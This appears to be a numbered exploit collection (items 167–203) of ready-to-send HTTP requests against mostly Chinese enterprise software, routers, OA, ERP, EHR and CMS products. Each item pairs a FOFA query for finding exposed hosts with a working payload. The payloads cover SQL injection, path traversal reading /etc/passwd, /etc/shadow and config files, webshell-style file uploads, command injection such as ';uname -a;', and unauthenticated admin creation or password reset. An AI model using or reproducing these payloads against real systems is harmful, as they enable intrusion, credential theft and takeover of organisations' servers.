User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"

POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"

POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联 FE Enterprise Operation Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星 Internet Access Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. Henan 风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit system assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the uploaded file to see the result:

GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie obtained above, then access the uploaded file:

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正 All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"

Obtain the __VIEWSTATE and __EVENTVALIDATION values:

GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the following request:

POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--